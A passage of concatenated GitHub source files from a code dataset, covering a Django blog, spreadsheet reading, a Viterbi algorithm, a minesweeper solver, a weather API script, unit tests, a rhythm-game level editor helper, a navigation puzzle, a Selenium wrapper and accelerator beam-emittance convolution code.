get_object_or_404, redirect\nfrom .models import Post, Comment\nfrom django.contrib import messages\nfrom .forms import PostForm, CommentForm\nfrom django.core.paginator import Paginator\n\n# Create your views here.\ndef home(request): #request란? 사용자가 요청한 메서드 + string + ... 값 / 해쉬 형태로 넘어간다\n post_list = Post.objects.all().order_by('-updated_at')\n paginator = Paginator(post_list, 10)\n\n page = request.GET.get('page')\n posts = paginator.get_page(page)\n\n return render(request, 'blog/home.html', {'posts' : posts})\n\ndef detail(request, post_id):\n post = get_object_or_404(Post, pk=post_id)\n return render(request, 'blog/detail.html', {'post': post})\n\ndef new(request):\n if request.method == 'POST':\n form = PostForm(request.POST)\n if form.is_valid():\n post = form.save()\n return redirect('detail', post.pk)\n else:\n form = PostForm()\n return render(request, 'blog/new.html', {'form': form})\n\ndef comment_new(request, pk):\n post = get_object_or_404(Post, pk=pk) #post를 가져와서 댓글을 쓸 post를 인식함\n if request.method == \"POST\":\n form = CommentForm(request.POST)\n # post = get_object_or_404(Post)\n if form.is_valid():\n comment = form.save(commit = False)\n comment.post = post\n comment.save()\n return redirect('detail', post.pk) #pk = post(변수).pk라고 써줘야 함\n else:\n form = CommentForm()\n return render(request, 'blog/comment_new.html', {'form': form})\n\n","repo_name":"hayeon9826/django_crud","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8394730055","text":"from pathlib import Path\nfrom openpyxl import Workbook, load_workbook\nfrom openpyxl.worksheet.worksheet import Worksheet\n\nROOT_FOODER = Path(__file__).parent\nWORKBOOK_PATH = ROOT_FOODER / 'workbook.xlsx'\n\nworkbook: Workbook = load_workbook(WORKBOOK_PATH)\n\nsheet_name = 'Minha_Panilha'\n\nworksheet: Worksheet = workbook[sheet_name]\n\nfor row in worksheet.iter_rows():\n for cell in row:\n print(cell)\n \n# workbook.save(WORKBOOK_PATH)\n","repo_name":"Thiago-Teofilo/curso_python","sub_path":"python_curso_completo/m06_modules/aula334_openpyxl/reading.py","file_name":"reading.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27722713610","text":"'''\n@author: Armin\n'''\nimport numpy as np\n\nclass viterbi(object):\n \n####################### Constructor #####################\n\n def __init__(self, initialTable, transitionTable, emissionTable, deltaTable, psTable):\n self.initialTable = initialTable\n self.transitionTable = transitionTable \n self.emissionTable = emissionTable\n self.deltaTable = deltaTable\n self.psTable = psTable\n\n####################### Functions #######################\n def Initialization(self):\n for i in range(len(self.deltaTable[0])):\n self.deltaTable[0][i] = np.multiply(InitialTable[i], EmissionTable[i][1])\n \n def Deltas(self, obs):\n \n obsIndex = 1\n psIndex = 1\n v = []\n delta = 0\n\n for d in range(len(self.deltaTable)-1):\n d += 1\n for j in range(len(self.deltaTable[d])):\n for i in range(len(self.transitionTable)):\n v.append(self.deltaTable[d-1][i] * self.transitionTable[i][j])\n delta = max(v) * self.emissionTable[j][obs[obsIndex]]\n self.deltaTable[d][j] = delta\n self.psTable[psIndex][j] = max(v)\n delta = 0\n v = []\n obsIndex += 1\n psIndex += 1\n print(\"Delta Table\")\n print(self.deltaTable)\n print(\"Psi Table\")\n print(self.psTable)\n\n####################### Data Import #############################\n\n# States = {S, R, F}\n# Symbols = {U, N}\n\nInitialTable = np.loadtxt(\"Viterbi_Data/InitialTable.txt\", delimiter=',', dtype=np.float64)\n\nTransitionTable = np.loadtxt(\"Viterbi_Data/TransitionTable.txt\", delimiter=',', dtype=np.float64)\n\nEmissionTable = np.loadtxt(\"Viterbi_Data/EmissionTable.txt\", delimiter=',', dtype=np.float64)\n\n####################### Data #############################\n#This is the table where we keep deltas\ndeltaTable = np.zeros((3,3), dtype= np.float64)\n\n#Back Tracking\npsTable = np.zeros((3,3), dtype= np.float64)\n\n# Data = NUU\ndata = [1, 0, 0]\n\ntest = viterbi(InitialTable, TransitionTable, EmissionTable, deltaTable, psTable)\ntest.Initialization()\ntest.Deltas(data)\n","repo_name":"Armin-Smailzade/data-science-python","sub_path":"Forward and Viterbi Algorithm/viterbi.py","file_name":"viterbi.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73208844007","text":"\ndef minesweeper(minefield, n, m, field):\n\n keys = []\n for x in range(1, n+1):\n for i in range(1,m+1):\n if i in range(1,10):\n keys.append(x+float(\"0.0%r\" %(i)))\n else:\n keys.append(x+float(\"0.%r\" %(i)))\n\n vertes = []\n for i in range(0,n):\n line = minefield.pop(0)\n for a in line:\n vertes.append(a)\n\n dictas = dict(zip(keys, vertes))\n\n for key in dictas:\n bombos = []\n if float((\"%.2f\" % (key - 1.01))) in dictas:\n bombos.append(dictas[float((\"%.2f\" % (key - 1.01)))])\n if float((\"%.2f\" % (key - 1.0))) in dictas:\n bombos.append(dictas[float((\"%.2f\" % (key - 1.0)))])\n if float((\"%.2f\" % (key - 0.99))) in dictas:\n bombos.append(dictas[float((\"%.2f\" % (key - 0.99)))])\n if float((\"%.2f\" % (key - 0.01))) in dictas:\n bombos.append(dictas[float((\"%.2f\" % (key - 0.01)))])\n if float((\"%.2f\" % (key + 0.01))) in dictas:\n bombos.append(dictas[float((\"%.2f\" % (key + 0.01)))])\n if float((\"%.2f\" % (key + 0.99))) in dictas:\n bombos.append(dictas[float((\"%.2f\" % (key + 0.99)))])\n if float((\"%.2f\" % (key + 1.0))) in dictas:\n bombos.append(dictas[float((\"%.2f\" % (key + 1.0)))])\n if float((\"%.2f\" % (key + 1.01))) in dictas:\n bombos.append(dictas[float((\"%.2f\" % (key + 1.01)))])\n\n nr = 0\n for b in bombos:\n if b == '*':\n nr += 1\n\n if dictas[key] != \"*\":\n dictas[key] = nr\n\n output = []\n for key in sorted(dictas.keys()):\n output.append(dictas[key])\n\n print(\"\\nField #%r:\" % (field))\n\n for i,item in enumerate(output):\n if (i+1)%m == 0:\n print(item)\n else:\n print(item,end='')\n\n\ndef main():\n\n minefield = []\n with open('input3.txt') as inputfile:\n for line in inputfile:\n minefield.append(line.strip())\n\n\n field = 1\n while minefield:\n nm = minefield.pop(0)\n nm = nm.split()\n\n n = int(nm[0])\n m = int(nm[1])\n\n blokas = []\n for i in range(0,n):\n blokas.append(minefield.pop(0))\n\n if n != 0 and m != 0:\n minesweeper(blokas, n, m, field)\n\n field += 1\n\n\nmain()\n","repo_name":"00riddle00/BSc1-InformaticsBasics","sub_path":"python/3_minesweeper.py","file_name":"3_minesweeper.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27382799827","text":"import requests\r\nimport json\r\nfrom datetime import datetime\r\n\r\nAPI_key = 'b47d9ec1405359d146e41bd7c750adae'\r\ncity_name = 'Cherkessk'\r\ncountry = 'RU'\r\nlat = 44.2233\r\nlon = 42.0578\r\nexclude = 'minutely,hourly,alerts'\r\n\r\nURL = f'https://api.openweathermap.org/data/2.5/onecall?lat={lat}&lon={lon}&exclude={exclude}&appid={API_key}'\r\nr = requests.get(URL)\r\nweater = r.json()\r\ndaily = weater['daily']\r\n\r\n\r\ndef to_cels(temp):\r\n t = temp - 273.15\r\n return t\r\n\r\n\r\ndef get_temps(daily):\r\n dif_temps = []\r\n for i in daily:\r\n d_temp = abs(round(to_cels(i['temp'].get('morn')) - to_cels(i['temp'].get('night')), 2))\r\n dif_temps.append(d_temp)\r\n return dif_temps\r\n\r\n\r\ndef get_pressure(daily):\r\n pressures = []\r\n for i in range(5):\r\n pressures.append(daily[i].get('pressure'))\r\n return pressures\r\n\r\n\r\ndef get_day(daily, dif_temps):\r\n for i in daily:\r\n t = round(abs(i['temp'].get('morn') - i['temp'].get('night')), 2)\r\n if t == max(dif_temps):\r\n d = datetime.fromtimestamp(i.get('dt')).date()\r\n return d, t\r\n\r\n\r\ndif_temps = get_temps(daily)\r\nmax_pres = max(get_pressure(daily))\r\nprint('Максимальное давление за 5 дней: ', max_pres)\r\nday, temp = get_day(daily, dif_temps)\r\nprint('День с максимальной разницей: ', day)\r\nprint('Разница температур: ', temp)\r\n","repo_name":"Zick09/Parsing","sub_path":"parse(weater).py","file_name":"parse(weater).py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21656919693","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n:Purpose: Testing module for the ``pywarnings`` module.\n\n:Platform: Linux/Windows | Python 3.6+\n:Developer: J Berendt\n:Email: development@s3dev.uk\n\n:Comments: n/a\n\n\"\"\"\n# pylint: disable=invalid-name\n\nimport contextlib\nimport io\nimport warnings\ntry:\n from .base import TestBase\n from .testlibs import msgs\n from .testlibs.utilities import utilities\nexcept ImportError:\n from base import TestBase\n from testlibs import msgs\n from testlibs.utilities import utilities\n# The imports for utils4 must be after TestBase.\nfrom utils4.pywarnings import PyWarnings\n\n\nclass TestPyWarnings(TestBase):\n \"\"\"Testing class used to test the ``pywarnings`` module.\"\"\"\n\n _MSG1 = msgs.templates.not_as_expected.general\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Run this logic at the start of all test cases.\"\"\"\n msgs.startoftest.startoftest(module_name='pywarnings')\n\n def test01__ignore_warnings__single(self):\n \"\"\"Test the ``ignore_warnings`` method, for a single category.\n\n :Test:\n - Verify the FutureWarnings are allowed, ignored and re-allowed.\n\n \"\"\"\n buff = io.StringIO()\n pw = PyWarnings(ignore=True, categories=['FutureWarning'])\n with contextlib.redirect_stderr(buff):\n # Test 1\n warnings.warn('', FutureWarning)\n test1 = buff.getvalue()\n buff.truncate(0)\n buff.seek(0)\n # Test 2\n pw.ignore_warnings()\n warnings.warn('', FutureWarning)\n test2 = buff.getvalue()\n buff.truncate(0)\n buff.seek(0)\n # Test 3\n pw.reset_warnings()\n warnings.warn('', FutureWarning)\n test3 = buff.getvalue()\n buff.truncate(0)\n buff.seek(0)\n self.assertIn(member='FutureWarning', container=test1)\n utilities.assert_true(expected='', test=test2, msg=self._MSG1)\n self.assertIn(member='FutureWarning', container=test3)\n\n def test02__ignore_warnings__multiple(self):\n \"\"\"Test the ``ignore_warnings`` method, for multiple categories.\n\n :Test:\n - Verify the following warnings are allowed, ignored and\n re-allowed:\n\n - Futurewarning\n - ResourceWarning\n - UserWarning\n\n \"\"\"\n buff = io.StringIO()\n classes = [FutureWarning, ResourceWarning, UserWarning]\n strings = [c.__name__ for c in classes]\n pw = PyWarnings(ignore=True, categories=strings)\n with contextlib.redirect_stderr(buff):\n # Test 1\n for c, s in zip(classes, strings):\n warnings.warn('', c)\n test1 = buff.getvalue()\n buff.truncate(0)\n buff.seek(0)\n # Test 2\n pw.ignore_warnings()\n warnings.warn('', c)\n test2 = buff.getvalue()\n buff.truncate(0)\n buff.seek(0)\n # Test 3\n pw.reset_warnings()\n warnings.warn('', c)\n test3 = buff.getvalue()\n buff.truncate(0)\n buff.seek(0)\n self.assertIn(member=s, container=test1)\n utilities.assert_true(expected='', test=test2, msg=self._MSG1)\n self.assertIn(member=s, container=test3)\n\n def test03__ignore_warnings__config(self):\n \"\"\"Test the ``ignore_warnings`` method, using a dict.\n\n :Test:\n - Verify the FutureWarning is allowed, ignored and re-allowed.\n\n \"\"\"\n buff = io.StringIO()\n config = {'py_warnings': {'ignore': True, 'categories': 'FutureWarning'}}\n pw = PyWarnings(config=config)\n with contextlib.redirect_stderr(buff):\n # Test 1\n warnings.warn('', FutureWarning)\n test1 = buff.getvalue()\n buff.truncate(0)\n buff.seek(0)\n # Test 2\n pw.ignore_warnings()\n warnings.warn('', FutureWarning)\n test2 = buff.getvalue()\n buff.truncate(0)\n buff.seek(0)\n # Test 3\n pw.reset_warnings()\n warnings.warn('', FutureWarning)\n test3 = buff.getvalue()\n buff.truncate(0)\n buff.seek(0)\n self.assertIn(member='FutureWarning', container=test1)\n utilities.assert_true(expected='', test=test2, msg=self._MSG1)\n self.assertIn(member='FutureWarning', container=test3)\n","repo_name":"S3DEV/utils4","sub_path":"tests/test_pywarnings.py","file_name":"test_pywarnings.py","file_ext":"py","file_size_in_byte":4595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12472409652","text":"def max(a,b,c):\n \"\"\"This function takes three numbers as input and outputs the\n largest of the three numbers \"\"\"\n if a>b and a>c:\n print(f\"{a} is maximum\")\n elif b>a and b>c:\n print(f\"{b} is maximum\")\n else:\n print(f\"{c} is maximum\")\n \nn1=int(input(\"Enter 1st number \"))\nn2=int(input(\"Enter 2nd number\"))\nn3=int(input(\"Enter 3rd number\"))\nmax(n1,n2,n3)\n","repo_name":"Access7-s/Python-Exercise","sub_path":"Python exercises Beginners/max_check.py","file_name":"max_check.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3434044562","text":"import sys\r\nimport os\r\ndef renameFilter(filterName):\r\n if filterName == 'VD':return 'VHS'\r\n if filterName == 'LED':return 'LED'\r\n if filterName == 'RAIN':return 'Rain'\r\n if filterName == 'BLI':return 'Blizzard'\r\n if filterName == 'PXS':return 'PixelSnow'\r\n if filterName == 'COM':return 'Compression'\r\n if filterName == 'PIX':return 'Pixelate'\r\n if filterName == 'WAV':return 'Waves'\r\n if filterName == 'STA':return 'Static'\r\n if filterName == 'GRA':return 'Grain'\r\n if filterName == 'MOT':return 'MotionBlur'\r\n if filterName == 'FIS':return 'Fisheye'\r\n if filterName == 'ABE':return 'Aberration'\r\n if filterName == 'DRA':return 'Drawing'\r\nfilename=input('type the name of the file> ')\r\nif '.adofai' in filename:pass\r\nelse:filename+='.adofai'\r\ntilenumber=input('tile number> ')\r\nstartoffset=input('starting angle> ')\r\nfinaloffset=input('final angle> ')\r\nstartvalue=input('start value> ')\r\nendvalue=input('end value> ')\r\ncount=input('count> ')\r\nfiltername=input('''filtername\r\nVHS LED Rain Blizzard Pixelsnow Compression Pixelate Waves Static Grain MotionBlur Fisheye Aberration Drawing\r\n> ''')\r\nt1=float(startoffset)\r\nt2=float(finaloffset)\r\nx1=float(startvalue)\r\nx2=float(endvalue)\r\nn=int(count)\r\nf=open(filename,'rt',encoding='utf-8')\r\nFILE=[]\r\nwhile True:\r\n line=f.readline()\r\n if not line:break\r\n else:FILE.append(line)\r\nfor x in range(0,2):del FILE[len(FILE)-1]\r\nstrength=[]\r\nangle=[]\r\nfor i in range(n):\r\n strength.append(x1+(x2-x1)*i/(n-1))\r\n angle.append(t1+(t2-t1)*i/(n-1))\r\n\r\nFILE.append(f'\\t\\t{{ \"floor\": {tilenumber}, \"eventType\": \"SetFilter\", \"filter\": \"{filtername}\", \"enabled\": \"Enabled\", \"intensity\": {str(strength[0])}, \"disableOthers\": \"Disabled\", \"angleOffset\": {str(angle[0])}, \"eventTag\": \"\" }},\\n')\r\nfor i in range(1, n):\r\n FILE.append(f'\\t\\t{{ \"floor\": {tilenumber}, \"eventType\": \"SetFilter\", \"filter\": \"{filtername}\", \"enabled\": \"Enabled\", \"intensity\": {str(strength[i])}, \"disableOthers\": \"Disabled\", \"angleOffset\": {str(angle[i])}, \"eventTag\": \"\" }},\\n')\r\nFILE.append('\\t]\\n')\r\nFILE.append('}\\n')\r\ng=open('DONE.adofai', 'wt', encoding='utf-8')\r\ng.write(''.join(FILE))\r\ng.close()\r\nprint('Open DONE.adofai for final')\r\nos.system('pause')\r\n","repo_name":"junlovecat/ADOFAI_effect_generator","sub_path":"effect_generator.py","file_name":"effect_generator.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24957347836","text":"from selenium.webdriver import Firefox, FirefoxOptions\nfrom spider.logger import Logger\n\n\nclass Base(Logger):\n\n def __init__(self):\n Logger.__init__(self)\n self.logger.info(\"Starting Firefox..\")\n options = FirefoxOptions()\n options.add_argument(\"--headless\")\n try:\n self.browser = Firefox(options=options)\n self.logger.info(\"Firefox Ready..\")\n except Exception as e:\n self.logger.error(\"Firefox could not be started.\")\n self.logger.error(e)\n quit(-1)\n\n def quit(self):\n if self.browser:\n self.logger.info(\"Quitting Firefox..\")\n self.browser.quit()\n","repo_name":"sharathg/stock_checker","sub_path":"spider/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36490679844","text":"from math import sin, cos, radians\n\ndef move_wp(dir, distance, pos):\n (x, y) = pos\n if dir == 'N':\n y += distance\n elif dir == 'S':\n y -= distance\n elif dir == 'E':\n x += distance\n elif dir == 'W':\n x -= distance\n\n return (x, y)\n\ndef rotate_wp(turn_dir, deg, waypoint):\n deg = deg * -1 if turn_dir == 'R' else deg\n rad = radians(deg)\n\n (x,y) = waypoint\n \n # vector rotation\n rx = round(x*cos(rad) - y*sin(rad))\n ry = round(x*sin(rad) + y*cos(rad))\n\n return (rx, ry)\n\ndef move(pos, waypoint, distance):\n (x, y) = pos\n (wx, wy) = waypoint\n\n return (x + distance * wx, y + distance * wy)\n\nwith open('input.txt', 'r') as file:\n nav_instructions = [r for r in file.read().split('\\n')]\n\n pos = (0,0)\n waypoint = (10, 1)\n\n for inst in nav_instructions:\n action = inst[:1]\n distance = int(inst[1:])\n \n if action == 'F':\n pos = move(pos, waypoint, distance)\n elif action in 'LR':\n waypoint = rotate_wp(action, distance, waypoint)\n else:\n waypoint = move_wp(action, distance, waypoint)\n\n manhattan_dist = abs(pos[0])+abs(pos[1])\n print(manhattan_dist)","repo_name":"finafisken/adventofcode2020","sub_path":"day12/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19402446834","text":"__author__ = 'Sergey Tomin'\n\nfrom numpy import sqrt, reshape, shape, pi, exp, zeros, array, meshgrid\nfrom matplotlib import cm\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom ocelot.lib.genera.src.python.convolution.convolution_gauss import convolution_1D_cpp, convolution_2D_cpp\n\n\ndef plot3D_data(data, x, y):\n X,Y = meshgrid(x,y)\n fig = plt.figure()\n ax = Axes3D(fig)\n #ax = fig.add_subplot(111, projection = \"3d\")\n ax.plot_surface(X, Y, data, rstride=1, cstride=1, cmap=cm.jet)\n\n#def conditions_emitt_spread(screen):\n# if screen.ne ==1 and (screen.nx and screen.ny):\n# effect = 1\n# elif screen.ne ==1 and (screen.nx==1 and screen.ny):\n# effect = 2\n# elif screen.ne ==1 and (screen.nx and screen.ny == 1):\n# effect = 3\n# elif screen.ne >1 and (screen.nx == 1 and screen.ny == 1):\n# effect = 4\n# else:\n# effect = 0\n# return effect\n\ndef beam_sizes_on_screen(beam, screen):\n if beam.emit_x == 0 or beam.emit_y == 0:\n print (\"Emittance switched off. One of emittances is zero\")\n return False\n beam.sizes()\n screen.beam_size_x = sqrt(beam.sigma_x*beam.sigma_x*1e6 + (beam.sigma_xp*screen.Distance)**2) # mm\n screen.beam_size_y = sqrt(beam.sigma_y*beam.sigma_y*1e6 + (beam.sigma_yp*screen.Distance)**2) # mm\n\n if screen.beam_size_x == 0:\n print (\"Emittance switched off. Hor. e-beam size projection on screen is zero\")\n return False\n\n if screen.beam_size_y == 0:\n print (\"Emittance switched off. Ver. e-beam size projection on screen is zero\")\n return False\n print (\"Hor. e-beam size projection on screen: \", screen.beam_size_x, \" mm\")\n print (\"Ver. e-beam size projection on screen: \", screen.beam_size_y, \" mm\")\n\n #if beam.beta_x and beam.beta_y:\n #\n # beam.sizes()\n # #print beam.sigma_x, beam.sigma_xp\n # #print beam.sigma_y, beam.sigma_yp\n # #print \"Distance = \", screen.Distance, \" mm\"\n # screen.beam_size_x = sqrt(beam.sigma_x*beam.sigma_x*1e6 + (beam.sigma_xp*screen.Distance)**2)\n # screen.beam_size_y = sqrt(beam.sigma_y*beam.sigma_y*1e6 + (beam.sigma_yp*screen.Distance)**2)\n # print \"Hor. e-beam size projection on screen: \", screen.beam_size_x, \" mm\"\n # print \"Ver. e-beam size projection on screen: \", screen.beam_size_y, \" mm\"\n # return True\n #\n #elif not beam.beta_x or not beam.beta_y:\n #\n # print \"Emittance switched off: one of the beta functions is zero \"\n # return False\n #\n #else:\n # print \"Emittance switched off: beam dimensions are zero size \"\n return True\n\ndef change_size(n, step, start, half_size, acc = 3):\n n_add = 0\n accuracy = acc\n if half_size != 0:\n if step == 0:\n n_add = 3*accuracy\n n = 2*n_add + 1\n start -= half_size\n step = half_size/n_add\n else:\n n_add = (int(half_size/step)+1)\n n += 2*n_add\n start -= n_add*step\n return n,step,start, n_add\n\ndef change_sizes_screen(screen, beam):\n # all sizes in mm and mrad!!!\n\n ## energy spread is not correct\n # screen.fund_harm_eV -> screen.start_energy\n screen.sigma_e = 2.*beam.sigma_E/beam.E*screen.start_energy\n #print \"sigma_e = \", screen.sigma_e\n screen.nx_add = 0\n screen.ny_add = 0\n screen.ne_add = 0\n\n if beam_sizes_on_screen(beam, screen):\n\n if screen.ne == 1:\n screen.nx, screen.x_step, screen.x_start, screen.nx_add = change_size(screen.nx, screen.x_step, screen.x_start, screen.beam_size_x*1.) # emittance X\n screen.ny, screen.y_step, screen.y_start, screen.ny_add = change_size(screen.ny, screen.y_step, screen.y_start, screen.beam_size_y*1.) # emittance Y\n screen.ne, screen.e_step, screen.e_start, screen.ne_add = change_size(screen.ne, screen.e_step, screen.e_start, screen.sigma_e*3.) # energy spread\n\n elif screen.nx ==1 and screen.ny ==1:\n if screen.theta_x !=0 and screen.theta_y != 0:\n screen.nx, screen.x_step, screen.x_start, screen.nx_add = change_size(screen.nx, screen.x_step, screen.x_start, screen.theta_x*screen.Distance) # emittance X\n screen.ny, screen.y_step, screen.y_start, screen.ny_add = change_size(screen.ny, screen.y_step, screen.y_start, screen.theta_y*screen.Distance) # emittance Y\n screen.ne, screen.e_step, screen.e_start, screen.ne_add = change_size(screen.ne, screen.e_step, screen.e_start, screen.sigma_e*3.) # energy spread\n else:\n screen.nx, screen.x_step, screen.x_start, screen.nx_add = change_size(screen.nx, screen.x_step, screen.x_start, screen.beam_size_x) # emittance X\n screen.ny, screen.y_step, screen.y_start, screen.ny_add = change_size(screen.ny, screen.y_step, screen.y_start, screen.beam_size_y) # emittance Y\n screen.ne, screen.e_step, screen.e_start, screen.ne_add = change_size(screen.ne, screen.e_step, screen.e_start, screen.sigma_e*3.) # energy spread\n else:\n print (\"Emittance switched off. Screen sizes are wrong. ne >1 and (nx or ny) >1\")\n\n elif screen.nx ==1 and screen.ny ==1:\n screen.ne, screen.e_step, screen.e_start, screen.ne_add = change_size(screen.ne, screen.e_step, screen.e_start, screen.sigma_e*3.) # energy spread\n elif screen.ne == 1:\n screen.ne, screen.e_step, screen.e_start, screen.ne_add = change_size(screen.ne, screen.e_step, screen.e_start, screen.sigma_e*3.) # energy spread\n else:\n print (\"1_ Emittance switched off. Screen sizes are wrong. ne >1 and (nx or ny) >1\")\n\n\n\ndef emittance_on(screen):\n Pi = [] #zeros((screen.ny - 2*screen.ny_add, screen.nx - 2*screen.nx_add))\n Sigma = []# zeros((screen.ny - 2*screen.ny_add, screen.nx - 2*screen.nx_add))\n\n #print \"$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\"\n nx_ny = screen.nx*screen.ny\n #print nx_ny, shape(screen.Pi), shape(screen.Sigma), screen.beam_size_x ,screen.beam_size_y, screen.ne\n for ie in range(screen.ne):\n #print ie\n data_pi = screen.Pi[nx_ny*ie : nx_ny*(ie+1)]\n data_sigma = screen.Sigma[nx_ny*ie : nx_ny*(ie+1)]\n #print shape(data_pi), shape(data_sigma)\n data_pi = convolution_2D_cpp(data_pi,screen.Xph,screen.Yph,screen.nx_add, screen.ny_add, screen.beam_size_x ,screen.beam_size_y )\n data_sigma = convolution_2D_cpp(data_sigma,screen.Xph,screen.Yph, screen.nx_add, screen.ny_add, screen.beam_size_x ,screen.beam_size_y )\n\n #mean_pi = sum(data_pi)/len(data_pi)\n #data_pi[:] = mean_pi\n #mean_sigma = sum(data_sigma)/len(data_sigma)\n #data_sigma[:] = mean_sigma\n\n data_pi = reshape(data_pi, (screen.ny , screen.nx ))\n data_sigma = reshape(data_sigma, (screen.ny , screen.nx ))\n #print shape(data_sigma)\n data_pi = data_pi[screen.ny_add : -screen.ny_add, screen.nx_add : -screen.nx_add]\n data_sigma = data_sigma[screen.ny_add : -screen.ny_add, screen.nx_add : -screen.nx_add]\n Pi.append(data_pi)\n Sigma.append(data_sigma)\n\n screen.Xph = screen.Xph[screen.nx_add : screen.nx-screen.nx_add]\n screen.Yph = screen.Yph[screen.ny_add : screen.ny-screen.ny_add]\n screen.x_start += screen.nx_add*screen.x_step\n screen.y_start += screen.ny_add*screen.y_step\n screen.nx -= 2*screen.nx_add\n screen.ny -= 2*screen.ny_add\n return Pi, Sigma\n\ndef spread_on(screen, Pi,Sigma):\n sigma_e = screen.sigma_e\n ## energy spread is not correct\n # screen.fund_harm_eV -> screen.start_energy\n k = lambda energy: exp(-(energy - screen.start_energy)**2/(2.*sigma_e*sigma_e))/(sqrt(2.*pi)*sigma_e)\n\n if screen.ne - 2*screen.ne_add == 1:\n\n e_pi = zeros(shape(Pi[0]))\n e_sigma = zeros(shape(Pi[0]))\n\n d_e = screen.Eph[1] - screen.Eph[0]\n for ie in range(screen.ne):\n\n eph = screen.Eph[ie]\n #print ie, k(eph), eph\n #print array(Pi[ie])\n #print array(e_pi)\n e_pi += array(Pi[ie])*k(eph)*d_e\n e_sigma += array(Sigma[ie])*k(eph)*d_e\n #print Sigma[ie]\n #plt.plot(range(len(Sigma[ie])), Sigma[ie])\n #plt.show()\n screen.Pi = reshape(e_pi, screen.nx*screen.ny)\n #plot3D_data(e_pi, screen.Xph, screen.Yph)\n\n screen.Sigma = reshape(e_sigma, screen.nx*screen.ny)\n #plot3D_data(e_sigma, screen.Xph, screen.Yph)\n\n screen.Total = screen.Sigma + screen.Pi\n #plot3D_data(screen.Total, screen.Xph, screen.Yph)\n #plt.show()\n #!!!!!!\n screen.Eph = screen.Eph[screen.ne_add : screen.ne - screen.ne_add]\n screen.ne -= 2*screen.ne_add\n else:\n #print shape(Pi), shape(reshape(Pi,shape(Pi)[0]))\n Pi = reshape(Pi,shape(Pi)[0])\n Pi = convolution_1D_cpp(Pi,screen.Eph, screen.ne_add, screen.sigma_e)\n screen.Pi = Pi[screen.ne_add : screen.ne - screen.ne_add]\n #print \"%%%% = \",shape(Pi)\n Sigma = reshape(Sigma,shape(Sigma)[0])\n Sigma = convolution_1D_cpp(Sigma,screen.Eph, screen.ne_add, screen.sigma_e)\n screen.Sigma = Sigma[screen.ne_add : screen.ne - screen.ne_add]\n screen.Total = screen.Sigma + screen.Pi\n\n\n #print \"$$$ Total= \", screen.ne, shape(screen.Total)\n screen.Eph = screen.Eph[screen.ne_add : screen.ne - screen.ne_add]\n screen.ne -= 2*screen.ne_add\n\n\ndef convolution_all(screen):\n #ypoint*xpoint*je + xpoint*jy + jx\n if not screen.nx_add and not screen.ny_add and not screen.ne_add:\n print (\"no convolution\")\n return 0\n\n if screen.nx_add and screen.ny_add: #emittance switch on!!\n Pi, Sigma = emittance_on(screen)\n else:\n Pi = reshape(screen.Pi, (screen.ne, screen.nx*screen.ny))\n\n Sigma = reshape(screen.Sigma, (screen.ne, screen.nx*screen.ny))\n #print \"shape = \", shape(Pi)\n if screen.ne_add:\n print (\"energy spread on\")\n spread_on(screen, Pi,Sigma)\n #plot3D_data(screen.Total, screen.Xph, screen.Yph)\n #plt.show()\n return 0\n screen.Pi = reshape(Pi,shape(Pi)[0]*shape(Pi)[1]*shape(Pi)[2])\n screen.Sigma = reshape(Sigma,shape(Sigma)[0]*shape(Sigma)[1]*shape(Sigma)[2])\n screen.Total = screen.Pi + screen.Sigma\n \"\"\"\n else:\n if shape(Pi)[1] == 1 and shape(Pi)[2] == 1:\n screen.Pi = reshape(Pi,shape(Pi)[0])\n screen.Sigma = reshape(Sigma,shape(Sigma)[0])\n else:\n screen.Pi = array(Pi)\n screen.Sigma = array(Sigma)\n screen.Total = screen.Pi + screen.Sigma\n \"\"\"\n #print \"Total = \", shape(screen.Total)\nif __name__ == \"__main__\":\n from radiation.em_screen import EMScreen\n from classes.screen import Screen\n screen = Screen()\n screen.fund_harm_eV = 8200\n screen.z = 300.\n screen.x = 0.00\n\n screen.size_x = 0.003\n screen.size_y = 0.003\n screen.nx = 1\n screen.ny = 11\n screen.start_energy = 8000\n screen.end_energy = 8400\n screen.num_energy = 1\n em_screen = EMScreen(screen)\n from classes.beam import Beam\n beam = Beam()\n beam = Beam(x=0.,xp=-0.000115*0.,y=0,yp=0)\n beam.E = 17.5\n beam.sigma_E = 0.00*17.5\n beam.Q = 0.001\n beam.emit_x = 1.752e-11\n beam.emit_y = 1.752e-10\n beam.beta_x = 33.7\n beam.beta_y = 23.218\n beam.alpha_x = 1.219\n beam.alpha_y = -0.842\n print (em_screen.nx, em_screen.x_start, em_screen.x_step)\n print (em_screen.ny, em_screen.y_start, em_screen.y_step)\n print (em_screen.ne, em_screen.e_start, em_screen.e_step)\n change_sizes_screen(em_screen, beam)\n print (em_screen.nx, em_screen.x_start, em_screen.x_step, em_screen.nx_add)\n print (em_screen.ny, em_screen.y_start, em_screen.y_step, em_screen.ny_add)\n print (em_screen.ne, em_screen.e_start, em_screen.e_step, 